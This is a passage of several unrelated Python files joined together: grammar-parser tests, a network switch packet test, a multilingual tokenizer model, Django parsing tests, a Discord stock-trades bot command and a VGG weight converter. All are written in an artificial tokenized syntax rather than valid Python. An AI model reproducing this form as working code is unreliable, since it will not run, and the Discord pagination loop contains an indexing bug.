rules')<block_start>grammar.parse_expressions_to_indices_sequences(expression_strings=['x x'] max_length=8)<block_end><block_end><def_stmt>test_grammar_with_callables self<block_start>grammar_rules=['S -> S "+" S' # index 0 'S -> S "-" S' # index 1 'S -> "FUNCTION1(" P ")"' # index 2 'P -> T' # index 3 'P -> "1" "+" T' # index 4 'S -> T' # index 5 'T -> "FUNCTION2(" "x" "," "c" ")"' # index 6 ]<line_sep># padding rule index 7 grammar=arithmetic_grammar.Grammar(grammar_rules)<line_sep>indices_sequences=grammar.parse_expressions_to_indices_sequences(expression_strings=['FUNCTION1( FUNCTION2( x , c ) ) - '<concat>'FUNCTION2( x , c ) + FUNCTION2( x , c )'] max_length=10)<line_sep>np.testing.assert_equal(indices_sequences [# Preorder traversal of parsing tree. # S # | # S '+' S # | | # S '-' S T # | | | # 'FUNCTION1(' P ')' T 'FUNCTION2( x , c )' # | | # T 'FUNCTION2( x , c )' # | # 'FUNCTION2( x , c )' [0 # 'S -> S "+" S' 1 # 'S -> S "-" S' 2 # 'S -> "FUNCTION1(" P ")"' 3 # 'P -> T' 6 # 'T -> "FUNCTION2(" "x" "," "c" ")"' 5 # 'S -> T' 6 # 'T -> "FUNCTION2(" "x" "," "c" ")"' 5 # 'S -> T' 6 # 'T -> "FUNCTION2(" "x" "," "c" ")"' 7 # Padding dummy production rule. ]])<block_end><def_stmt>test_parse_expressions_to_indices_sequences self<block_start>grammar_rules=['S -> S "+" T' # index 0 'S -> T' # index 1 'T -> "(" S ")"' # index 2 'T -> "x"' # index 3 ]<line_sep># padding rule index 4 grammar=arithmetic_grammar.Grammar(grammar_rules)<line_sep>indices_sequences=grammar.parse_expressions_to_indices_sequences(expression_strings=['x + ( x )'] max_length=8)<line_sep>np.testing.assert_equal(indices_sequences [# Expression string: 'x + ( x )' # Preorder traversal of parsing tree. # S # | # S '+' T # | | # T '(' S ')' # | | # 'x' 'x' [0 # 'S -> S "+" T' 1 # 'S -> T' 3 # 'T -> "x"' 2 # 'T -> "(" S ")"' 1 # 'S -> T' 3 # 'T -> "x"' 4 # Padding dummy production rule. 4 # Padding dummy production rule. ]])<block_end><def_stmt>test_parse_expressions_to_indices_sequences_padding_at_end_false self<block_start>grammar_rules=['S -> S "+" T' # index 1 'S -> T' # index 2 'T -> "(" S ")"' # index 3 'T -> "x"' # index 4 ]<line_sep># padding rule index 0 grammar=arithmetic_grammar.Grammar(grammar_rules padding_at_end=<false>)<line_sep>indices_sequences=grammar.parse_expressions_to_indices_sequences(expression_strings=['x + ( x )'] max_length=8)<line_sep>np.testing.assert_equal(indices_sequences [# Expression string: 'x + ( x )' # Preorder traversal of parsing tree. # S # | # S '+' T # | | # T '(' S ')' # | | # 'x' 'x' [1 # 'S -> S "+" T' 2 # 'S -> T' 4 # 'T -> "x"' 3 # 'T -> "(" S ")"' 2 # 'S -> T' 4 # 'T -> "x"' 0 # Padding dummy production rule. 0 # Padding dummy production rule. ]])<block_end><def_stmt>test_parse_expressions_to_indices_sequences_pad_front_unique_start self<block_start>grammar_rules=['S -> S "+" T' # index 2 'S -> T' # index 3 'T -> "(" S ")"' # index 4 'T -> "x"' # index 5 ]<line_sep># padding rule index 0 # 'O -> S' will be added with index 1. grammar=arithmetic_grammar.Grammar(grammar_rules padding_at_end=<false> add_unique_production_rule_to_start=<true>)<line_sep>indices_sequences=grammar.parse_expressions_to_indices_sequences(expression_strings=['x + ( x )'] max_length=8)<line_sep>np.testing.assert_equal(indices_sequences [# Expression string: 'x + ( x )' # Preorder traversal of parsing tree. # O # | # S # | # S '+' T # | | # T '(' S ')' # | | # 'x' 'x' [1 # 'O -> S' 2 # 'S -> S "+" T' 3 # 'S -> T' 5 # 'T -> "x"' 4 # 'T -> "(" S ")"' 3 # 'S -> T' 5 # 'T -> "x"' 0 # Padding dummy production rule. ]])<block_end><def_stmt>test_parse_expressions_to_tensor self<block_start>grammar_rules=['S -> S "+" T' 'S -> T' 'T -> "(" S ")"' 'T -> "x"' ]<line_sep>grammar=arithmetic_grammar.Grammar(grammar_rules)<line_sep>expression_tensor=grammar.parse_expressions_to_tensor(expression_strings=['x + ( x )'] max_length=8)<line_sep>np.testing.assert_allclose(expression_tensor [# Expression string: 'x + ( x )' # Preorder traversal of parsing tree. # S # | # S '+' T # | | # T '(' S ')' # | | # 'x' 'x' [[1. 0. 0. 0. 0.] # 'S -> S "+" T' [0. 1. 0. 0. 0.] # 'S -> T' [0. 0. 0. 1. 0.] # 'T -> "x"' [0. 0. 1. 0. 0.] # 'T -> "(" S ")"' [0. 1. 0. 0. 0.] # 'S -> T' [0. 0. 0. 1. 0.] # 'T -> "x"' [0. 0. 0. 0. 1.] # Padding dummy production rule. [0. 0. 0. 0. 1.] # Padding dummy production rule. ]])<block_end><def_stmt>test_parse_expressions_to_tensor_padding_at_end_false self<block_start>grammar_rules=['S -> S "+" T' 'S -> T' 'T -> "(" S ")"' 'T -> "x"' ]<line_sep>grammar=arithmetic_grammar.Grammar(grammar_rules padding_at_end=<false>)<line_sep>expression_tensor=grammar.parse_expressions_to_tensor(expression_strings=['x + ( x )'] max_length=8)<line_sep>np.testing.assert_allclose(expression_tensor [# Expression string: 'x + ( x )' # Preorder traversal of parsing tree. # S # | # S '+' T # | | # T '(' S ')' # | | # 'x' 'x' [[0. 1. 0. 0. 0.] # 'S -> S "+" T' [0. 0. 1. 0. 0.] # 'S -> T' [0. 0. 0. 0. 1.] # 'T -> "x"' [0. 0. 0. 1. 0.] # 'T -> "(" S ")"' [0. 0. 1. 0. 0.] # 'S -> T' [0. 0. 0. 0. 1.] # 'T -> "x"' [1. 0. 0. 0. 0.] # Padding dummy production rule. [1. 0. 0. 0. 0.] # Padding dummy production rule. ]])<block_end><block_end><if_stmt>__name__<eq>'__main__'<block_start>tf.test.main()<block_end>
<import_stmt>sys<import_stmt>ptf.packet<as>scapy<import_stmt>ptf.dataplane<as>dataplane<import_stmt>acs_base_test<import_from_stmt>ptf.base_tests BaseTest<import_stmt>ptf.testutils<as>testutils<import_from_stmt>ptf.testutils *<import_stmt>scapy.all<as>scapy2<class_stmt>SendTCP(acs_base_test.ACSDataplaneTest)<block_start><def_stmt>runTest self<block_start>pkt=scapy2.Ether(src="e4:1d:2d:a5:f3:ac" dst="00:02:03:04:05:00")<line_sep>pkt<augdiv>scapy2.IP(src="10.0.0.1" dst="10.0.0.0")<line_sep># get L4 port number port_number=testutils.test_params_get("port_number")<line_sep>port=port_number["port_number"]<line_sep>pkt<augdiv>scapy2.TCP(sport=int(port))<line_sep>pkt<augdiv>("badabadaboom")<line_sep># get packets number count=testutils.test_params_get("count")<line_sep>pack_number=count["count"]<line_sep># send packets send(self 0 pkt int(pack_number))<block_end><block_end>
<import_stmt>sys<import_from_stmt>cube.networks.utils unpack mask_concat<line_sep>sys.path.append('')<import_stmt>os argparse<line_sep>os.environ["TOKENIZERS_PARALLELISM"]="false"<import_stmt>pytorch_lightning<as>pl<import_stmt>torch.nn<as>nn<import_stmt>torch.nn.functional<as>F<import_stmt>torch<import_from_stmt>cube.io_utils.objects Document Sentence Token Word<import_from_stmt>cube.io_utils.encodings Encodings<import_from_stmt>cube.io_utils.config TokenizerConfig<import_from_stmt>cube.networks.utils_tokenizer TokenCollate<import_stmt>numpy<as>np<import_from_stmt>cube.networks.modules ConvNorm LinearNorm MLP<import_from_stmt>torch.utils.data DataLoader<import_stmt>random<import_from_stmt>cube.networks.modules WordGram<class_stmt>Tokenizer(pl.LightningModule)<block_start><def_stmt>__init__ self config:TokenizerConfig encodings:Encodings language_codes:[]=<none> ext_word_emb=0 max_seq_len=-1<block_start>super().__init__()<line_sep>self._language_codes=language_codes<line_sep>self._config=config<line_sep>self._max_seq_len=max_seq_len<if_stmt><not>isinstance(ext_word_emb list)<block_start>ext_word_emb=[ext_word_emb]<block_end>self._ext_word_emb=ext_word_emb<line_sep>conv_layers=[]<line_sep>cs_inp=config.external_proj_size+config.lang_emb_size+256+16<line_sep>NUM_FILTERS=config.cnn_filter<for_stmt>_ range(config.cnn_layers)<block_start>conv_layer=nn.Sequential(ConvNorm(cs_inp NUM_FILTERS kernel_size=5 stride=1 padding=2 dilation=1 w_init_gain='tanh') nn.BatchNorm1d(NUM_FILTERS))<line_sep>conv_layers.append(conv_layer)<line_sep>cs_inp=NUM_FILTERS<floordiv>2+config.lang_emb_size<block_end>self._convs=nn.ModuleList(conv_layers)<line_sep>self._wg=WordGram(len(encodings.char2int) num_langs=encodings.num_langs)<line_sep>self._lang_emb=nn.Embedding(encodings.num_langs+1 config.lang_emb_size padding_idx=0)<line_sep>self._spa_emb=nn.Embedding(3 16 padding_idx=0)<line_sep>self._output=LinearNorm(NUM_FILTERS<floordiv>2+config.lang_emb_size 5)<line_sep>ext2int=[]<for_stmt>input_size self._ext_word_emb<block_start>module=MLP(input_size config.external_proj_size)<line_sep>ext2int.append(module)<block_end>self._ext_proj=nn.ModuleList(ext2int)<if_stmt>self._language_codes# only for training <block_start>self._dev_results={i:[]<for>i,_ enumerate(self._language_codes)}<line_sep>self._res={}<for_stmt>language_code self._language_codes<block_start>self._res[language_code]={"sent":0. "token":0.}<block_end>self._early_stop_meta_val=0<line_sep>self._epoch_results={}<block_end><block_end><def_stmt>forward self batch<block_start>x_emb=batch['x_input']<line_sep>x_spa=batch['x_input_spa']<line_sep>x_lang=batch['x_lang']<line_sep>x_lang=self._lang_emb(x_lang).unsqueeze(1).repeat(1 x_emb[0].shape[1] 1)<line_sep>x_word_char=batch['x_word_char']<line_sep>x_word_case=batch['x_word_case']<line_sep>x_word_lang=batch['x_word_lang']<line_sep>x_word_masks=batch['x_word_masks']<line_sep>x_word_len=batch['x_word_len']<line_sep>x_sent_len=batch['x_sent_len']<line_sep>char_emb_packed=self._wg(x_word_char x_word_case x_word_lang x_word_masks x_word_len)<line_sep>sl=x_sent_len.cpu().numpy()<line_sep>x_char_emb=unpack(char_emb_packed sl x_emb[0].shape[1] device=self._get_device())<line_sep>word_emb_ext=<none><for_stmt>ii range(len(x_emb))<block_start>we=x_emb[ii]<if_stmt>word_emb_ext<is><none><block_start>word_emb_ext=self._ext_proj[ii](we.float().to(self._get_device()))<block_end><else_stmt><block_start>word_emb_ext=word_emb_ext+self._ext_proj[ii](we)<block_end><block_end>word_emb_ext=word_emb_ext/len(x_emb)<line_sep>word_emb_ext=torch.tanh(word_emb_ext)<line_sep>x_emb=word_emb_ext<line_sep>x_spa_emb=self._spa_emb(x_spa)<line_sep>x_emb=mask_concat([x_emb x_char_emb] 0.33 self.training self._get_device())<line_sep>x_emb=torch.cat([x_emb x_spa_emb] dim=-1)<line_sep>x=torch.cat([x_emb x_lang] dim=-1).permute(0 2 1)<line_sep>x_lang=x_lang.permute(0 2 1)<line_sep>half=self._config.cnn_filter<floordiv>2<line_sep>res=<none><line_sep>cnt=0<for_stmt>conv self._convs<block_start>conv_out=conv(x)<line_sep>tmp=torch.tanh(conv_out[: :half :])<times>torch.sigmoid((conv_out[: half: :]))<if_stmt>res<is><none><block_start>res=tmp<block_end><else_stmt><block_start>res=res+tmp<block_end>x=torch.dropout(tmp 0.2 self.training)<line_sep>cnt<augadd>1<if_stmt>cnt<ne>self._config.cnn_layers<block_start>x=torch.cat([x x_lang] dim=1)<block_end><block_end>x=x+res<line_sep>x=torch.cat([x x_lang] dim=1)<line_sep>x=x.permute(0 2 1)<line_sep><return>self._output(x)<block_end><def_stmt>validation_step self batch batch_idx<block_start><if_stmt>batch['x_input']<is><none><block_start>print("Return 0")<line_sep><return><none><block_end>x_lang=batch['x_lang']<line_sep>x_text=batch['x_text']<line_sep>y_offset=batch['y_offset'].cpu().numpy()<line_sep>y_target=batch['y_output'].cpu().numpy()<line_sep>y_len=batch['y_len'].cpu().numpy()<line_sep>x_l=x_lang.cpu().numpy()<line_sep>y_pred=self.forward(batch)<line_sep>y_pred=torch.argmax(y_pred dim=-1).detach().cpu().numpy()<for_stmt>ii range(len(y_len))<block_start>ofs=y_offset[ii]<line_sep>lang=x_l[ii]-1<for_stmt>jj range(y_len[ii])<block_start>self._dev_results[lang].append([x_text[ii][jj] y_target[ii jj+ofs] y_pred[ii jj+ofs]])<block_end><block_end><block_end><def_stmt>validation_epoch_end self outputs<arrow><none># empty accumulator # results = {langid: {'SENT_F': 0, 'TOK_F': 0} for langid in self._id2lang} <block_start>results={}<for_stmt>lang self._dev_results<block_start>data=self._dev_results[lang]<line_sep>g_sents=[]<line_sep>p_sents=[]<line_sep>tok_p=''<line_sep>tok_g=''<line_sep>g_sent=[]<line_sep>p_sent=[]<for_stmt>example data<block_start>target=example[1]<line_sep>pred=example[2]<line_sep>text=example[0].replace('▁' '')<line_sep>tok_g<augadd>text<line_sep>tok_p<augadd>text<if_stmt>target<eq>2<or>target<eq>3<or>target<eq>4<block_start><if_stmt>tok_g.strip()<ne>''<block_start>g_sent.append(tok_g)<block_end>tok_g=''<block_end><if_stmt>target<eq>4<block_start><if_stmt>len(g_sent)<ne>0<block_start>g_sents.append(g_sent)<block_end>g_sent=[]<block_end><if_stmt>pred<eq>2<or>pred<eq>3<or>pred<eq>4<block_start><if_stmt>tok_p.strip()<ne>''<block_start>p_sent.append(tok_p)<block_end>tok_p=''<block_end><if_stmt>pred<eq>4<block_start><if_stmt>len(p_sent)<ne>0<block_start>p_sents.append(p_sent)<block_end>p_sent=[]<block_end><block_end><if_stmt>tok_g.strip()<ne>''<block_start>g_sent.append(tok_g)<block_end><if_stmt>len(g_sent)<ne>0<block_start>g_sents.append(g_sent)<block_end><if_stmt>tok_p.strip()<ne>''<block_start>p_sent.append(tok_p)<block_end><if_stmt>len(p_sent)<ne>0<block_start>p_sents.append(p_sent)<block_end>sent_f,tok_f=_conll_eval(g_sents p_sents)<if_stmt>self._language_codes<is><not><none><block_start>lang=self._language_codes[lang]<block_end>results[lang]={}<line_sep>results[lang]['sent']=sent_f<line_sep>results[lang]['token']=tok_f<line_sep>self.log('val/SENT/{0}'.format(lang) sent_f)<line_sep>self.log('val/TOKEN/{0}'.format(lang) tok_f)<block_end>self._dev_results={i:[]<for>i,_ enumerate(self._language_codes)}<line_sep>self._epoch_results=self._compute_early_stop(results)<line_sep>self.log('val/early_meta' self._early_stop_meta_val)<block_end><def_stmt>training_step self batch batch_idx<block_start><if_stmt>batch['x_input']<is><none><block_start>print("Return 0")<line_sep><return><none><block_end>y_target=batch['y_output']<if_stmt>self._max_seq_len<ne>-1<and>y_target.shape[1]<g>self._max_seq_len# fix for HF <block_start><return><none><block_end>y_pred=self.forward(batch)<line_sep>loss=F.cross_entropy(y_pred.view(-1 y_pred.shape[2]) y_target.view(-1) ignore_index=0)<line_sep><return>loss<block_end><def_stmt>load self model_path:str device:str='cpu'<block_start>self.load_state_dict(torch.load(model_path map_location='cpu')['state_dict'])<line_sep>self.to(device)<block_end><def_stmt>process self raw_text collate:TokenCollate batch_size=32 num_workers:int=4 lang_id:int=0<block_start>raw_text=raw_text.replace('\n' ' ').replace('\r' ' ')<line_sep>new_text=raw_text.replace(' ' ' ')<while_stmt>new_text<ne>raw_text<block_start>raw_text=new_text<line_sep>new_text=raw_text.replace(' ' ' ')<block_end>self.eval()<import_from_stmt>cube.networks.utils_tokenizer TokenDatasetLive<line_sep>dataset=TokenDatasetLive(raw_text collate.get_tokens)<line_sep>collate._lang_id=lang_id<line_sep>dataloader=DataLoader(dataset batch_size=batch_size collate_fn=collate.collate_fn shuffle=<false> num_workers=num_workers)<line_sep>toks=[]<line_sep>preds=[]<import_stmt>tqdm<for_stmt>batch dataloader# tqdm.tqdm(dataloader): <block_start><for_stmt>key batch<block_start><if_stmt>isinstance(batch[key] torch.Tensor)<block_start>batch[key]=batch[key].to(self._device)<block_end><block_end>x_text=batch['x_text']<line_sep>y_offset=batch['y_offset'].cpu().numpy()<line_sep>y_len=batch['y_len'].cpu().numpy()<with_stmt>torch.no_grad()<block_start>y_pred=self.forward(batch)<block_end>y_pred=torch.argmax(y_pred dim=-1).detach().cpu().numpy()<for_stmt>ii range(len(y_len))<block_start>ofs=y_offset[ii]<for_stmt>jj range(y_len[ii])<block_start>toks.append(x_text[ii][jj])<line_sep>preds.append(y_pred[ii jj+ofs])<block_end><block_end><block_end>p_sents=[]<line_sep>tok_p=''<line_sep>p_mwes=[]<line_sep>p_sent=[]<line_sep>p_mwe=[]<for_stmt>pred,text zip(preds toks)<block_start>text=text.replace('▁' '')<line_sep>tok_p<augadd>text<if_stmt>pred<eq>2<or>pred<eq>3<or>pred<eq>4<block_start><if_stmt>tok_p.strip()<ne>''<block_start>p_sent.append(tok_p)<if_stmt>pred<eq>3<block_start>p_mwe.append(<true>)<block_end><else_stmt><block_start>p_mwe.append(<false>)<block_end><block_end>tok_p=''<block_end><if_stmt>pred<eq>4<block_start><if_stmt>len(p_sent)<ne>0<block_start>p_sents.append(p_sent)<line_sep>p_mwes.append(p_mwe)<block_end>p_sent=[]<line_sep>p_mwe=[]<block_end><block_end><if_stmt>tok_p.strip()<ne>''<block_start>p_sent.append(tok_p)<line_sep>p_mwe.append(<false>)<block_end><if_stmt>len(p_sent)<ne>0<block_start>p_sents.append(p_sent)<line_sep>p_mwes.append(p_mwe)<block_end>d=Document()<for_stmt>sent,mwe zip(p_sents p_mwes)<block_start>seq=[]<line_sep>cnt=0<line_sep>spaceafter="_"<for_stmt>w,m zip(sent mwe)<block_start>cnt<augadd>1<line_sep>seq.append(Word(cnt w '_' '_' '_' '_' 0 '_' '_' spaceafter))<if_stmt>m<block_start>seq[-1].space_after<augadd>';compund'<block_end><block_end>s=Sentence(sequence=seq lang_id=lang_id)<line_sep>d.sentences.append(s)<block_end><return>d<block_end><def_stmt>configure_optimizers self<block_start><return>torch.optim.AdamW(self.parameters())<block_end><def_stmt>_compute_early_stop self res<block_start><for_stmt>lang res<block_start><if_stmt>res[lang]["sent"]<g>self._res[lang]["sent"]<block_start>self._early_stop_meta_val<augadd>1<line_sep>self._res[lang]["sent"]=res[lang]["sent"]<line_sep>res[lang]["sent_best"]=<true><block_end><if_stmt>res[lang]["token"]<g>self._res[lang]["token"]<block_start>self._early_stop_meta_val<augadd>1<line_sep>self._res[lang]["token"]=res[lang]["token"]<line_sep>res[lang]["token_best"]=<true><block_end><block_end><return>res<block_end><def_stmt>_get_device self<block_start><if_stmt>self._lang_emb.weight.device.type<eq>'cpu'<block_start><return>'cpu'<block_end><return>'{0}:{1}'.format(self._lang_emb.weight.device.type str(self._lang_emb.weight.device.index))<block_end><def_stmt>_detect_no_space_lang document:Document<block_start>seen_spc=0<line_sep>POLL_RANGE=50<for_stmt>ii range(POLL_RANGE)<block_start>index=random.randint(0 len(document.sentences)-1)<line_sep>text=document.sentences[index].text.strip()<if_stmt>' '<in>text<block_start>seen_spc<augadd>1<block_end><block_end><if_stmt>seen_spc/POLL_RANGE<g>0.5<block_start><return><false><block_end><else_stmt><block_start><return><true><block_end><block_end><class_stmt>PrintAndSaveCallback(pl.callbacks.Callback)<block_start><def_stmt>__init__ self store_prefix<block_start>super().__init__()<line_sep>self.store_prefix=store_prefix<block_end><def_stmt>on_validation_end self trainer pl_module<block_start>metrics=trainer.callback_metrics<line_sep>epoch=trainer.current_epoch<line_sep># from pprint import pprint # pprint(metrics) <for_stmt>lang pl_module._epoch_results<block_start>res=pl_module._epoch_results[lang]<if_stmt>"sent_best"<in>res<block_start>trainer.save_checkpoint(self.store_prefix+"."+lang+".sent")<block_end><if_stmt>"token_best"<in>res<block_start>trainer.save_checkpoint(self.store_prefix+"."+lang+".tok")<block_end><block_end>trainer.save_checkpoint(self.store_prefix+".last")<line_sep>s="{0:30s}\tSENT\tTOKEN".format("Language")<line_sep>print("\n\n\t"+s)<line_sep>print("\t"+("="<times>(len(s)+9)))<for_stmt>lang pl_module._language_codes<block_start>sent=metrics["val/SENT/{0}".format(lang)]<line_sep>token=metrics["val/TOKEN/{0}".format(lang)]<line_sep>msg="\t{0:30s}:\t{1:.4f}\t{2:.4f}".format(lang sent token)<line_sep>print(msg)<block_end>print("\n")<block_end><block_end><block_end><def_stmt>_conll_eval gold pred<block_start>f=open('tmp_g.txt' 'w')<for_stmt>sent gold<block_start><for_stmt>ii range(len(sent))<block_start>head=ii<line_sep>f.write('{0}\t{1}\t_\t_\t_\t_\t{2}\t_\t_\t_\n'.format(ii+1 sent[ii] head))<block_end>f.write('\n')<block_end>f.close()<line_sep>f=open('tmp_p.txt' 'w')<for_stmt>sent pred<block_start><for_stmt>ii range(len(sent))<block_start>head=ii<line_sep>f.write('{0}\t{1}\t_\t_\t_\t_\t{2}\t_\t_\t_\n'.format(ii+1 sent[ii] head))<block_end>f.write('\n')<block_end>f.close()<import_from_stmt>_cube.misc.conll18_ud_eval_wrapper conll_eval<line_sep>result=conll_eval('tmp_g.txt' 'tmp_p.txt')<if_stmt>result<is><none><block_start><return>0 0<block_end><else_stmt><block_start><return>result['Sentences'].f1 result['Tokens'].f1<block_end><block_end>""" if __name__ == '__main__': from cube.io_utils.misc import ArgParser argparser = ArgParser() # run argparser args = argparser() print(args) # example import json langs = json.load(open(args.train_file)) doc_train = Document() doc_dev = Document() id2lang = {} for ii in range(len(langs)): lang = langs[ii] print(lang[1], ii) doc_train.load(lang[1], lang_id=ii) doc_dev.load(lang[2], lang_id=ii) id2lang[ii] = lang[0] # ensure target dir exists target = args.store i = args.store.rfind("/") if i > 0: target = args.store[:i] os.makedirs(target, exist_ok=True) enc = Encodings() enc.compute(doc_train, None) enc.save('{0}.encodings'.format(args.store)) config = TokenizerConfig() no_space_lang = _detect_no_space_lang(doc_train) print("NO_SPACE_LANG = " + str(no_space_lang)) config.no_space_lang = no_space_lang config.lm_model = args.lm_model if args.config_file: config.load(args.config_file) if args.lm_model is not None: config.lm_model = args.lm_model config.save('{0}.config'.format(args.store)) # helper = LMHelper(device=args.lm_device, model=config.lm_model) # helper.apply(doc_dev) # helper.apply(doc_train) trainset = TokenizationDataset(doc_train) devset = TokenizationDataset(doc_dev, shuffle=False) collate = TokenCollate(enc, lm_device=args.lm_device, lm_model=args.lm_model, no_space_lang=config.no_space_lang) train_loader = DataLoader(trainset, batch_size=args.batch_size, collate_fn=collate.collate_fn, shuffle=True, num_workers=args.num_workers) val_loader = DataLoader(devset, batch_size=args.batch_size, collate_fn=collate.collate_fn, num_workers=args.num_workers) model = Tokenizer(config=config, encodings=enc, id2lang=id2lang) # training early_stopping_callback = EarlyStopping( monitor='val/early_meta', patience=args.patience, verbose=True, mode='max' ) if args.gpus == 0: acc = 'ddp_cpu' else: acc = 'ddp' trainer = pl.Trainer( gpus=args.gpus, accelerator=acc, num_nodes=1, default_root_dir='data/', callbacks=[early_stopping_callback, PrintAndSaveCallback(args, id2lang)], # limit_train_batches=5, # limit_val_batches=2, ) trainer.fit(model, train_loader, val_loader) """<line_sep>
<import_from_future_stmt> unicode_literals<import_stmt>datetime<import_stmt>django<import_stmt>mock<import_from_stmt>django.test TestCase<import_from_stmt>django.utils.timezone utc<import_stmt>util.parse<as>parse_util<class_stmt>TestParse(TestCase)<block_start><def_stmt>setUp self<block_start>django.setup()<block_end><def_stmt>test_duration_to_string self<block_start>"""Tests converting timedelta duration to ISO duration string"""<line_sep>duration_1=datetime.timedelta(seconds=0)<line_sep>self.assertEqual(parse_util.duration_to_string(duration_1) 'PT0S')<line_sep>duration_2=datetime.timedelta(days=4 seconds=58426)<line_sep>self.assertEqual(parse_util.duration_to_string(duration_2) 'P4DT16H13M46S')<line_sep>duration_3=datetime.timedelta(seconds=542.0894)<line_sep>self.assertEqual(parse_util.duration_to_string(duration_3) 'PT9M2S')<line_sep>duration_4=datetime.timedelta(seconds=542.5894)<line_sep>self.assertEqual(parse_util.duration_to_string(duration_4) 'PT9M3S')<block_end><def_stmt>test_parse_duration self<block_start>"""Tests parsing a valid ISO duration."""<line_sep>self.assertEqual(parse_util.parse_duration('PT3H0M0S') datetime.timedelta(0 10800))<block_end><def_stmt>test_parse_duration_invalid self<block_start>"""Tests parsing an invalid ISO duration."""<line_sep>self.assertIsNone(parse_util.parse_duration('BAD'))<block_end><def_stmt>test_parse_datetime self<block_start>"""Tests parsing a valid ISO datetime."""<line_sep>self.assertEqual(parse_util.parse_datetime('2015-01-01T00:00:00Z') datetime.datetime(2015 1 1 tzinfo=utc))<block_end><def_stmt>test_parse_datetime_invalid self<block_start>"""Tests parsing an invalid ISO datetime."""<line_sep>self.assertIsNone(parse_util.parse_datetime('20150101T00:00:00Z'))<block_end><def_stmt>test_parse_datetime_missing_timezone self<block_start>"""Tests parsing an ISO datetime missing a timezone."""<line_sep>self.assertRaises(ValueError parse_util.parse_datetime '2015-01-01T00:00:00')<block_end>@mock.patch('django.utils.timezone.now')<def_stmt>test_parse_timestamp_duration self mock_now<block_start>"""Tests parsing a valid ISO duration."""<line_sep>mock_now.return_value=datetime.datetime(2015 1 1 10 tzinfo=utc)<line_sep>self.assertEqual(parse_util.parse_timestamp('PT3H0M0S') datetime.datetime(2015 1 1 7 tzinfo=utc))<block_end><def_stmt>test_parse_timestamp_datetime self<block_start>"""Tests parsing a valid ISO datetime."""<line_sep>self.assertEqual(parse_util.parse_timestamp('2015-01-01T00:00:00Z') datetime.datetime(2015 1 1 tzinfo=utc))<block_end><block_end>
<import_stmt>discord<import_stmt>pandas<as>pd<import_from_stmt>gamestonk_terminal.stocks.due_diligence ark_model<import_stmt>discordbot.config_discordbot<as>cfg<import_from_stmt>discordbot.run_discordbot logger<import_from_stmt>discordbot.helpers pagination<async_keyword><def_stmt>arktrades_command ctx ticker="" num=""<block_start>"""Displays trades made by ark [cathiesark.com]"""<try_stmt># Debug user input <block_start><if_stmt>cfg.DEBUG<block_start>logger.debug("!stocks.dd.arktrades %s" ticker)<block_end><if_stmt>num<eq>""<block_start><pass><block_end><else_stmt><block_start><if_stmt><not>num.lstrip("-").isnumeric()<block_start><raise>Exception("Number has to be an integer")<block_end>num=int(num)<block_end><if_stmt>ticker<eq>""<block_start><raise>Exception("A ticker is required")<block_end>ark_holdings=ark_model.get_ark_trades_by_ticker(ticker)<if_stmt>ark_holdings.empty<block_start><raise>Exception("Issue getting data from cathiesark.com. Likely no trades found.\n")<block_end>ark_holdings=ark_holdings.drop(columns=["ticker"])<line_sep>ark_holdings["Total"]=ark_holdings["Total"]/1_000_000<line_sep>ark_holdings.rename(columns={"Close":"Close ($)" "Total":"Total ($1M)"} inplace=<true>)<line_sep>ark_holdings.index=pd.Series(ark_holdings.index).apply(<lambda>x:x.strftime("%Y-%m-%d"))<if_stmt>num<eq>""<block_start>ark_holdings_str=ark_holdings.to_string()<block_end><else_stmt><block_start>ark_holdings_str=ark_holdings.head(num).to_string()<block_end><if_stmt>len(ark_holdings_str)<le>4000<block_start>embed=discord.Embed(title=f"Stocks: [cathiesark.com] {ticker} Trades by Ark" description="```"+ark_holdings_str+"```" colour=cfg.COLOR )<line_sep>embed.set_author(name=cfg.AUTHOR_NAME icon_url=cfg.AUTHOR_ICON_URL )<line_sep><await>ctx.send(embed=embed)<block_end><else_stmt><block_start>i=0<line_sep>str_start=0<line_sep>str_end=4000<line_sep>columns=[]<while_stmt>i<le>len(ark_holdings_str)/4000<block_start>columns.append(discord.Embed(title=f"Stocks: [cathiesark.com] {ticker} Trades by Ark" description="```"+ark_holdings_str[str_start:str_end]+"```" colour=cfg.COLOR ).set_author(name=cfg.AUTHOR_NAME icon_url=cfg.AUTHOR_ICON_URL ))<line_sep>str_end=str_start<line_sep>str_start<augadd>4000<line_sep>i<augadd>1<block_end><await>pagination(columns ctx)<block_end><block_end><except_stmt>Exception<as>e<block_start>embed=discord.Embed(title=f"ERROR Stocks: [cathiesark.com] {ticker} Trades by Ark" colour=cfg.COLOR description=e )<line_sep>embed.set_author(name=cfg.AUTHOR_NAME icon_url=cfg.AUTHOR_ICON_URL )<line_sep><await>ctx.send(embed=embed)<block_end><block_end>
<import_stmt>argparse<import_stmt>re<import_stmt>chainer<import_from_stmt>chainer Link<import_stmt>chainer.links.caffe.caffe_function<as>caffe<line_sep>""" Please download a weight from here. http://www.robots.ox.ac.uk/%7Evgg/software/very_deep/caffe/VGG_ILSVRC_16_layers.caffemodel """<def_stmt>rename name<block_start>m=re.match(r'conv(\d+)_(\d+)$' name)<if_stmt>m<block_start>i,j=map(int m.groups())<line_sep><return>'conv{:d}_{:d}/conv'.format(i j)<block_end><return>name<block_end><class_stmt>VGGCaffeFunction(caffe.CaffeFunction)<block_start><def_stmt>__init__ self model_path<block_start>print('loading weights from {:s} ... '.format(model_path))<line_sep>super(VGGCaffeFunction self).__init__(model_path)<block_end><def_stmt>__setattr__ self name value<block_start><if_stmt>self.within_init_scope<and>isinstance(value Link)<block_start>new_name=rename(name)<if_stmt>new_name<eq>'conv1_1/conv'# BGR -> RGB <block_start>value.W.array[: ::-1]=value.W.array<line_sep>print('{:s} -> {:s} (BGR -> RGB)'.format(name new_name))<block_end><else_stmt><block_start>print('{:s} -> {:s}'.format(name new_name))<block_end><block_end><else_stmt><block_start>new_name=name<block_end>super(VGGCaffeFunction self).__setattr__(new_name value)<block_end><block_end><def_stmt>main <block_start>parser=argparse.ArgumentParser()<line_sep>parser.add_argument('caffemodel')<line_sep>parser.add_argument('output')<line_sep>args=parser.parse_args()<line_sep>model=VGGCaffeFunction(args.caffemodel)<line_sep>chainer.serializers.save_npz(args.output model)<block_end><if_stmt>__name__<eq>'__main__'<block_start>main()<block_end>
